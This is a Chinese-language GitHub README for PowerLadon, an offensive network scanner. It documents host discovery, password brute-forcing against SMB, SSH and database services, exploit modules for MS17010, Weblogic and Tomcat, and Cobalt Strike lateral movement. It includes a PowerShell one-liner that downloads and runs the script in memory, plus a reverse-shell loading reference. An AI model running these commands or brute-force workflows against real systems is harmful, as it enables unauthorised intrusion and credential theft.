Skip to content

Ladon hacking Scanner for PowerShell, vulnerability / exploit / detection / MS17010/SmbGhost,Brute-Force SMB/IPC/WMI/NBT/SSH/FTP/MSSQL/MYSQL/ORACLE/VNC

Notifications You must be signed in to change notification settings

k8gege/PowerLadon

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

55 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Ladon 911 for PowerShell

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

Ladon

LadonGUI

Cobalt Strike

PowerLadon

PythonLadon

LinuxLadon

使用说明

ID 主题 URL
1 Ladon文档主页 https://github.com/k8gege/Ladon/wiki
2 基础用法详解 https://github.com/k8gege/Ladon/wiki/Ladon-Usage
3 Cobalt Strike https://github.com/k8gege/Aggressor
4 Exp生成器使用 https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
5 高度自定义插件 https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
6 外部模块参考 https://github.com/k8gege/K8CScan/wiki
7 PowerLadon https://github.com/k8gege/powerladon
8 PythonLadon https://github.com/k8gege/PyLadon
9 LinuxLadon https://github.com/k8gege/LinuxLadon
10 漏洞演示视频 https://github.com/k8gege/K8CScan/tree/master/Video

源码编译

git clone https://github.com/k8gege/Ladon.git
使用VS2012或以上版本分别编译.net 3.5、4.0版本EXE

成品下载

https://github.com/k8gege/Ladon/releases
Win7/2008或安装.net 2.x 3.x系统可以使用3.5的exe
Win8-win10或安装.net 4.x系统可以使用4.0的exe

关于

Ladon是希腊神话中的神兽,看守金苹果的百头巨龙。它从不睡觉,被赫拉克勒斯借扛天巨人之手诱巨龙睡着
杀死巨龙并偷得了金苹果。巨龙死前将自己的魂魄封印在金苹果中,偷盗者将金苹果送给了白雪公主,公主
为了报恩将金苹果分给了七个小矮人,吃下以后他们变成了龙珠散落到世界各地,龙珠分为七颗,它蕴含着
可以令奇迹发生的力量。当集齐7颗龙珠念出咒语,就能召唤神龙,而神龙则会实现召唤者提出的一个愿望。

前言

无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高。
但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率。
漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞?
对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了。
因此我们需要一个支持批量C段/B段甚至A段的扫描器,添加自定义模块快速检测新出漏洞。

程序简介

Ladon模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。10.8版本内置198个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

使用简单

虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手
只需一或两个参数就可用90%的功能,一个模块相当于一个新工具

运行环境

Ladon.exe可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)
如Cmd、PowerShell、远控Cmd、WebShell等,以及Cobalt Strike内存加载使用
Ladon.ps1完美兼容win7-win10 PowerShell,不看版本可远程加载实现无文件渗透

奇葩条件

实战并不那么顺利,有些内网转发后很卡或无法转发,只能将工具上传至目标
有些马可能上传两三M的程序都要半天甚至根本传不了,PY的几十M就更别想了
Ladon采用C#研发,程序体积很小500K左右,即便马不行也能上传500K程序吧
还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的

宗旨

为用户提供一个简单易用、功能丰富、高度灵活、可定制的扫描工具,减少大量重复操作提高工作效率

程序参数功能

1 支持指定IP扫描
2 支持指定域名扫描
3 支持指定机器名扫描
4 支持指定C段扫描(ip/24)
5 支持指定B段扫描(ip/16)
6 支持指定A段扫描(ip/8)
7 支持指定URL扫描
8 支持批量IP扫描(ip.txt)
9 支持批量C段扫描(ip24.txt)
10 支持批量B段扫描(ip16.txt)
11 支持批量URL扫描(url.txt)
12 支持批量域名扫描(domain.txt)
13 支持批量机器名扫描(host.txt)
14 支持批量字符串列表(str.txt)
15 支持主机帐密列表(check.txt)
16 支持用户密码列表(userpass.txt)
17 支持指定范围C段扫描
18 支持参数加载自定义DLL(仅限C#)
19 支持参数加载自定义EXE(仅限C#)
20 支持参数加载自定义INI配置文件
21 支持参数加载自定义PowerShell
22 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)
23 支持自定义模块(支持多种语言编写的DLL/.NET程序集/PowerShell脚本)
24 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)

内置功能模块(40)

0x001 资产扫描

例子: Ladon OnlinePC(扫当前机器所处C段,其它模块同理)
例子: Ladon 192.168.1.8/24 OnlinePC

ID 模块名称 功能说明 返回结果
1 OnlinePC 存活主机扫描 存活IP、Mac地址、机器名
2 OnlineIP 仅存活主机IP 存活IP
3 UrlScan URL域名扫描 同服URL(不验证IP、域名、Web标题)
4 SameWeb 同服域名扫描 同服URL(验证IP、域名、Web标题)
5 WebScan Web信息扫描 存活IP、主机名、Banner、Web标题
6 WebDir 后台目录扫描 地址、HTTP状态
7 SubDomain 子域名爆破 子域名 (可用DomainIP/HostIP解析)
8 DomainIP 域名解析IP 域名、IP
9 HostIP 主机名转IP IP、域名

0x002 指纹识别/服务识别

例子: Ladon OsScan
例子: Ladon 192.168.1.8/24 OsScan

ID 模块名称 功能说明 返回结果
1 OsScan 操作系统版本探测 存活IP、机器名、操作系统
2 PortScan 端口扫描含Banner 主机名、开放端口、服务识别、Banner、Web标题
3 WhatCMS 75种Web指纹识别 URL、CMS版本、登陆页面、中间件等
4 CiscoScan 思科设备扫描 存活IP、设备型号、主机名、Boot、硬件版本
5 EnumMssql 枚举Mssql数据库主机 数据库IP、机器名、SQL版本
6 EnumShare 枚举网络共享资源 域、存活IP、共享路径

0x003 口令检测/密码爆破

[自定义端口(IP:端口)、帐密检测(用户 密码)、主机帐密检测(IP 端口 数据库 用户 密码)]

例子: Ladon SshScan
例子: Ladon 192.168.1.8/24 SshScan
例子: Ladon 192.168.1.8:22 SshScan (指定端口)
例子: Ladon test.rar RarScan

ID 模块名称 功能说明 返回结果 依赖
1 WmiScan Wmi密码爆破(Windowns) 检测状态以及正确密码日志
2 IpcScan Ipc密码爆破(Windows) 检测状态以及正确密码日志
3 SmbScan SMB密码爆破(Windows) 检测状态以及正确密码日志 SharpCifs.dll
4 SshScan SSH密码爆破(Linux) 检测状态以及正确密码日志 Renci.SshNet.dll
5 MssqlScan Mssql数据库密码爆破 检测状态以及正确密码日志
6 OracleScan Oracle数据库密码爆破 检测状态以及正确密码日志 DDTek.Oracle.dll
7 MysqlScan Mysql数据库密码爆破 检测状态以及正确密码日志 MySql.Data.dll
8 WeblogicScan Weblogic后台密码爆破 检测状态以及正确密码日志
9 VncScan VNC远程桌面密码爆破 检测状态以及正确密码日志 VncSharp.dll
10 FtpScan Ftp服务器密码爆破 检测状态以及正确密码日志
11 RarScan Rar压缩包密码爆破 检测状态以及正确密码日志 Rar.exe
12 TomcatScan Tomcat后台登陆密码爆破 检测状态以及正确密码日志
13 HttpBasicScan HttpBasic401认证密码爆破 检测状态以及正确密码日志

0x004 漏洞检测/漏洞利用

例子: Ladon MS17010
例子: Ladon 192.168.1.8/24 MS17010
例子: Ladon http://192.168.1.8 WeblogicExp

ID 模块名称 功能说明
1 MS17010 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144/CVE-2017-0145/CVE-2017-0146/CVE-2017-0148)
2 WeblogicPoc Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)
3 PhpStudyPoc PhpStudy后门检测(phpstudy 2016/phpstudy 2018)
4 ActivemqPoc ActiveMQ漏洞检测(CVE-2016-3088)
5 TomcatPoc Tomcat漏洞检测(CVE-2017-12615)
6 WeblogicExp Weblogic漏洞利用(CVE-2019-2725)
7 TomcatExp Tomcat漏洞利用(CVE-2017-12615)
8 Struts2Poc Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

0x005 加密解密

例子: Ladon 字符串 EnHex
例子: Ladon EnHex (批量str.txt)

ID 模块名称 功能说明
1 EnHex 批量Hex密码加密
2 DeHex 批量Hex密码解密
3 EnBase64 批量Base64密码加密
4 DeBase64 批量Base64密码解密

注:以上仅是该工具内置模块的初级用法,外置插件或更高级用法请查看使用文档
中级用法INI文件配置调用任意程序、系统命令、各种语言现成EXP的批量利用
高级用法Exp生成器一键生成Poc,使用各种语言编写插件扩展Ladon扫描能力。

外部插件模块(10)

ID 功能 实现语言 功能说明
1 漏洞扫描 C语言 CVE 2019-0708 Windows Rdp 3389漏洞批量检测
2 漏洞利用 Exp生成器 ThinkPHP 5.0.22 5.1.29 RCE GetShell Exploit
3 漏洞利用 Python CVE-2019-9621 Zimbra GetShell Exploit
4 漏洞利用 Python CVE-2019-0604 SharePoint GetShell Exploit
5 漏洞利用 Exp生成器 CVE 2016-3088 ActiveMQ GetShell Exploit
6 漏洞利用 Python Apache Solr 8.2.0 Velocity RCE 0day Exploit
7 漏洞利用 Exp生成器 PhpStudy后门 GetShell Exploit
8 命令执行 INI配置 INI调用外部程序命令批量Linux上控
9 命令执行 INI配置 INI调用外部程序命令批量Windowns上控
10 漏洞扫描 Python PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
11 漏洞扫描 Exp生成器 Weblogic CVE-2018-2894漏洞检测
12 漏洞利用 PowerShell MS17010EXP 永恒之蓝漏洞利用

文档参考Cscan: https://github.com/k8gege/K8CScan/wiki

中级用法

批量扫描

0x001 参数 ip/24 ip/16 ip/8
命令: Ladon 192.168.1.8/24 OnlinePC

0x002 文件 ip.txt ip24.txt ip16.txt url.txt host.txt domain.txt str.txt
程序根目录下创建对应文件即可,如批量扫描多个ip使用ip.txt,批量扫多个C段使用ip24.txt
无需指定txt程序会自动加载文件进行扫描,如扫描存活主机只需命令: Ladon OnlinePC

禁ping扫描

默认扫描会先通过icmp扫描主机是否存活,当使用工具转发内网
或者目标机器禁ping时,使用noping参数进行扫描,速度稍慢一点
Ladon noping
Ladon noping 192.168.1.8/24
Ladon noping 192.168.1.8/24 MS17010

配置INI调用任意程序或命令脚本

适用场景,需调用相关命令或第三方工具进行批量操作
或者有新的POC,但来不及或无法写成DLL来调用时
很多第3方工具不支持批量或者说根本不支持批量网段
而Ladon不只限于批量IP、URL、IP段、任意内容等
是紧急情况下最适合用于验证内网是否存在漏洞工具
新的漏洞来时你能调好POC就不错了,批量更要时间

1 调用系统ping命令进行存活主机探测 ping.ini
[Ladon]
exe=cmd.exe
arg=/c ping $ip$

命令: Ladon ping.ini
命令: Ladon 192.168.1.8/24 ping.ini

2 调用Python poc批量检测漏洞 [Ladon]
exe=F:\Python279\python.exe
arg=CVE-2019-11043-POC.py $ip$

例子: https://github.com/k8gege/CVE-2019-11043

配置端口扫描参数

使用PortScan模块时,默认扫描常见高危漏洞端口
遇到修改了默认端口的,Ladon就无法扫描了吗?
使用port.txt
格式1:80,21,1433,3306,445
格式2:80-88,21-23,5800-5900
格式3:
21
23
80
格式4:
80-88
21-23

配置密码爆破参数

1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认

数据库口令检测

数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行

mssql密码验证(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)

非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan

oracle同理

192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OracleScan

mysql无需指定数据库名

192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MysqlScan

系统密码

SSH
check.txt
192.168.1.8 22 root k8gege
192.168.1.8 root k8gege
命令: Ladon SshScan
SMB/IPC/WMI(直接ip/用户/密码)
check.txt 192.168.1.8 root k8gege
命令: Ladon WmiScan

网站密码

weblogic
check.txt(url 用户 密码)
http://192.168.1.8:7001/console weblogic k8gege
命令: Ladon WeblogicScan

文件密码

因Rar压缩包只需一个密码,故只需pass.txt,注意中文密码需将txt保存为Ansi编码
命令: Ladon test.rar RarScan

PowerShell

PowerLadon完美兼容win7-win10 PowerShell,对于不支持.net程序插件化的远控,可使用
PowerShell版,也可CMD命令行下远程加载内存实现无文件扫描,模块加载后用法和EXE一致。

0x001 PowerShell本地加载

适用于支持PowerShell交互远控或Shell,如Cobalt Strike

> powershell 
> Import-Module .\Ladon.ps1
> Ladon OnlinePC

0x002 Cmd本地加载

适用于还没跟上时代的远控或Shell只支持CMD交互

> powershell Import-Module .\Ladon.ps1;Ladon OnlinePC

0x003 Cmd远程加载

适用于还没跟上时代的远控或Shell只支持CMD交互

> powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC"

004 NC反弹SHELL加载Ladon

http://k8gege.org/p/LadonNC.html

高级用法

Ladon最初的设计就是一款扫描框架,为了方便才内置功能
毕竟需要使用一个功能就得在目标多上传一个文件是顶麻烦的
不像MSF框架和模块多大都无所谓,因为你只是在本地使用
为了让大家都可以自定义模块,Ladon插件支持多种编程语言
最菜可通过INI配置插件,了解HTTP可通过EXP生成器生成POC
懂得编程可使用C#、Delphi、VC编写DLL,PowerShell脚本

0x001 Exp生成器

EXP生成器教程: https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
实战例子: https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2018-2894

0x002 自定义模块教程

自定义模块教程: https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle

0x003 插件例子源码

https://github.com/k8gege/Ladon/raw/master/Moudle_Demo.rar

注本页面的教程并不是很全,详情请看WIKI,我会慢慢完善

Stargazers over time

Stargazers over time

About

Ladon hacking Scanner for PowerShell, vulnerability / exploit / detection / MS17010/SmbGhost,Brute-Force SMB/IPC/WMI/NBT/SSH/FTP/MSSQL/MYSQL/ORACLE/VNC

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published